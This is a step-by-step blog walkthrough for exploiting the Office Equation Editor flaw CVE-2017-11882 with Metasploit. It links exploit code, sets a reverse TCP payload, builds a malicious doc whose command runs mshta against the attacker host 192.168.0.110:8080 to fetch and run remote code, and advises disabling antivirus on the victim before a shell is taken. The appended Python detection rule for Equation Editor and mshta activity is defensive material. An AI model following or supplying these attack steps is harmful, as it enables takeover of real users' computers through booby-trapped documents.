Target machine: a computer with a vulnerable version of Office installed
Attacking machine: a Kali Linux host, IP: 192.168.0.110
Python script download link: https://github.com/Ridter/CVE-2017-11882
MSF module download: https://github.com/0x09AL/CVE-2017-11882-metasploit
One. Copy the cve_2017_11882.rb file downloaded above to the /usr/share/metasploit-framework/modules/exploits/windows/smb/ directory
Two. Put the downloaded cve_2017_11882.rtf into /usr/share/metasploit-framework/data/exploits/
If you don't put this file there, the exploit may fail when you run it
Three. Now for the fun part: open the mighty Metasploit
Four. Use the command search cve_2017_11882 to find the corresponding module
Five. Use the command use exploit/windows/smb/cve_2017_11882, and set the payload to reverse TCP
Six. Use the command set LHOST 192.168.0.110 (the IP of the attacking machine)
Seven. Use the command set URIPATH test to set the URI path (note the path test set here; this path must be added when using the Python script to generate the doc)
Eight. Check the configuration with show options
Nine. Run it: exploit -j
10. Open a different terminal, copy command109b_cve-2017-11882.py to the Kali Linux desktop, cd to the desktop, and run the command python command109b_cve-2017-11882.py -c "mshta http://192.168.0.110:8080/test" -o Test4.doc to generate a malicious doc file
Note: the URL must include port 8080 plus the URI path set above
11. Copy the file to the target machine and open it
360 will probably kill the file, so it is best to turn it off.
12. Back on the attacking Kali Linux machine, you can see the fish has taken the bait
13. Use the command sessions -i to view the session
14. Enter the command sessions -i 1 to switch into the session
15. Now we have successfully taken over the target machine. Enter shell to drop into the familiar CMD interface and use cmd commands.
Thank you for reading. If anything is lacking, please point it out; comments are welcome. Thank you ...
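What steps 10 to 12 look like from the target's process-creation log, as an added example that is not part of the original post: a small triage rule that flags children of the Equation Editor process (EQNEDT32.EXE, the Office component affected by CVE-2017-11882) and mshta launched with a remote URL. The field names follow Sysmon Event ID 1; the events, timestamps, example.test URL and the names classify and scan are constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# mshta given a remote http(s) URL as its argument, as in the step 10 command.
MSHTA_URL = re.compile(r'\bmshta(?:\.exe)?"?\s+"?(https?://[^\s"]+)', re.I)
EQUATION_EDITOR = "eqnedt32.exe"
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

def classify(event):
    """Return (severity, url) for one process-creation event, or None."""
    image = basename(event.get("Image", "")).lower()
    parent = basename(event.get("ParentImage", "")).lower()
    match = MSHTA_URL.search(event.get("CommandLine", ""))
    if parent == EQUATION_EDITOR and image != EQUATION_EDITOR:
        # Equation Editor does not normally start child processes.
        return ("critical", match.group(1) if match else None)
    if image == "mshta.exe" and match:
        sev = "high" if parent in OFFICE_PARENTS else "medium"
        return (sev, match.group(1))
    return None

def scan(events):
    """Return (UtcTime, severity, url) for every event that matches."""
    return [(e["UtcTime"], *hit) for e in events if (hit := classify(e))]

# Constructed sample events (assumed Sysmon-style fields, not real telemetry).
EQN = r"C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE"
SAMPLE_EVENTS = [
    {"UtcTime": "2017-11-25 10:02:05", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "CommandLine": r'WINWORD.EXE /n "C:\Users\lab\Desktop\Test4.doc"'},
    {"UtcTime": "2017-11-25 10:02:10", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": EQN,
     "CommandLine": "EQNEDT32.EXE -Embedding"},
    {"UtcTime": "2017-11-25 10:02:11", "ParentImage": EQN,
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://192.168.0.110:8080/test"},
    {"UtcTime": "2017-11-25 10:05:40", "ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" http://example.test/a.hta'},
    {"UtcTime": "2017-11-25 10:07:00", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Tools\menu.hta"'},
]

if __name__ == "__main__":
    for when, severity, url in scan(SAMPLE_EVENTS):
        print(f"{when} [{severity}] remote script URL: {url}")
```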